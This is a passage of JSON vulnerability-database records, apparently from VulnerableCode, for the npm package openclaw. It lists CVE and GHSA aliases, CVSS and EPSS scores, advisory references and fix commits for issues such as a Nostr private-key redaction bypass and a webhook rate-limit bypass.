                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-41354",
                "GHSA-rxmx-g7hr-8mx4"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d8v2-gft5-buee"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89082?format=api",
            "vulnerability_id": "VCID-da47-zdf1-mfgf",
            "summary": "## Summary\nOpenClaw Nostr privateKey config redaction bypass leaks plaintext signing key via config.get\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still models the Nostr privateKey as a plain string, so config views can expose it, and the secret-schema fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `57700d716f660591fb6e09727f3ca8041fa48b9d` — 2026-03-31T19:55:03+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @ccreater222 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41385",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03912",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03897",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0391",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41385"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/57700d716f660591fb6e09727f3ca8041fa48b9d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/57700d716f660591fb6e09727f3ca8041fa48b9d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jjw7-3vjf-fg5j",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jjw7-3vjf-fg5j"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41385",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41385"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-nostr-private-key-exposure-via-config-get-redaction-bypass",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-nostr-private-key-exposure-via-config-get-redaction-bypass"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jjw7-3vjf-fg5j",
                    "reference_id": "GHSA-jjw7-3vjf-fg5j",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jjw7-3vjf-fg5j"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41385",
                "GHSA-jjw7-3vjf-fg5j"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-da47-zdf1-mfgf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91608?format=api",
            "vulnerability_id": "VCID-dbcw-brhj-k7hs",
            "summary": "OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token\n## Summary\n\nSynology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Weak Webhook Token\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSynology Chat webhook auth previously rejected invalid tokens without throttling repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`.\n\n## Fix Commit(s)\n\n- `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35646",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23481",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23421",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23468",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35646"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35646",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35646"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mf5g-6r6f-ghhm",
                    "reference_id": "GHSA-mf5g-6r6f-ghhm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mf5g-6r6f-ghhm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
